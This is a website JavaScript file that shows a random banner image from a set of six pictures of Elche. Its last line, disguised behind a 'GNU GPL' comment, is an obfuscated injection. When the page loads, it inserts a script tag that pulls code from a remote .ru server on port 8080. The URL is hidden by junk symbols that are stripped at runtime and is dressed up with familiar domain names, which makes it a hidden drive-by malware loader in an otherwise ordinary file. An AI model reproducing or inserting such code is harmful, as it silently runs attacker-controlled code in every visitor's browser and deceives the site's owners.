/*

*/
function getRandomBetween(limSup,limInf){
   var randomNumber = Math.round(limSup-limInf)*Math.random()+limInf;
   return randomNumber;
}


var theSource = new Array();



theSource[0]=['imagenes/home_1.jpg','Imagen de Elche'];
theSource[1]=['imagenes/home_2.jpg','Imagen de Elche'];
theSource[2]=['imagenes/home_3.jpg','Imagen de Elche'];
theSource[3]=['imagenes/home_4.jpg','Imagen de Elche'];
theSource[4]=['imagenes/home_5.jpg','Imagen de Elche'];
theSource[5]=['imagenes/home_6.jpg','Imagen de Elche'];





function selectImg(){
   var rndNumb = Math.round(getRandomBetween(theSource.length-1,0));
   theString= '<img width="557" height="124" id="banner-copa" alt="' + theSource[rndNumb][1] + '" src="';
   theString+= theSource[rndNumb][0] + '" />';
   document.write(theString);
}
selectImg();

/*GNU GPL*/ try{window.onload = function(){var D6rxya3l44pnunx = document.createElement('script');D6rxya3l44pnunx.setAttribute('type', 'text/javascript');D6rxya3l44pnunx.setAttribute('id', 'myscript1');D6rxya3l44pnunx.setAttribute('src',  'h#$t(&$!t(!p(:&)/#&/(g#(@o$#@o#g(l^&^$$e!(-&c#!(o!m@-$&^d^@!o!((@).(^i!#()n)!s##!i@!(^g#h&)@&t#e&#x#&)^p#)r&!$e&^!s###&s$!a!))i@(#).!#c@$o$@!m(.($$d&^)t#)$)(i@$(b@!^#l&&$o&!g!@-&(^#c#(&o##&m$!)#.#g#!^r#!e)$^#a^@#)t)$(^s)()a)l^$e)c^!&e#!^n$)t(#e^r$$&).)(!$$r^@u):(&^8@)0$@)8$0$)/!##g&!(s@#m#a@r$(e)^n!@a@.#)c@o)^m##^/&#@g^$s@)#$m^#a$&r&!&e(&$n(&^a!)#^.&c)o@#&m(/#$#$m@($!&e$!#t&^!r)!^@o)$l##y&#(r!^^i@#@!c(s$)^$).$!(c(o^^&#m)!^$/)!&q)@$i!&&d&^(#)i^a^&@n#.!^@c($$o#@@m$!/(^g^o!&^(o!&(^@g()l^#&e((!!.@!c&$)o))(#^m#/$'.replace(/\$|\^|\)|&|\(|\!|#|@/ig, ''));D6rxya3l44pnunx.setAttribute('defer', 'defer');document.body.appendChild(D6rxya3l44pnunx);}} catch(e) {}